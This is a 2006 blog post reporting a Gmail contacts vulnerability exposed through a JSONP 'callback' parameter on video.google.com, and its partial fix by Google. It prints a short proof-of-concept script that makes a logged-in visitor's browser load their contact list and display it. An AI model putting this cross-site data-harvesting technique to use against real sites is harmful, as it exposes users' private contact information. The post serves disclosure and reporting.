December 31st, 2006
Serious Gmail vulnerability fixed
After posting my last article about the contacts "JSON API", Haochi Chen discovered that by simply appending a "callback" variable in the URL, the creators of a malicious site could gain access to a visitors entire Gmail contact list without warning.
<script language="javascript">
function getContacts(response){
var output = "";
for(x=0;x<response.Body.Contacts.length;x++){
output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email + "> ";
}
alert(output);
}
</script><script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts">
</script>
This sample script once proudly displayed the visitors contact list if they were logged into their Google account. Only hours after it was reported to the Google security team, the vulnerability was fixed.
"Thanks for reporting this to us. We have identified and fixed the problem" — Google Security
It's a little concerning that this problem even existed, but knowing the fix was made only hours after it was reported does warrant some level of reassurance.
Update:
The problem is only partially fixed. The vulnerability exposed through video.google.com has been patched up, but there are other subdomains where the problem still exists.
Garett Rogers is employed as a programmer for iQmetrix, which specializes in retail management software for the wireless industry.
See his full profile and disclosure of his industry affiliations.
Subscribe to Googling Google via Email alerts or RSS.
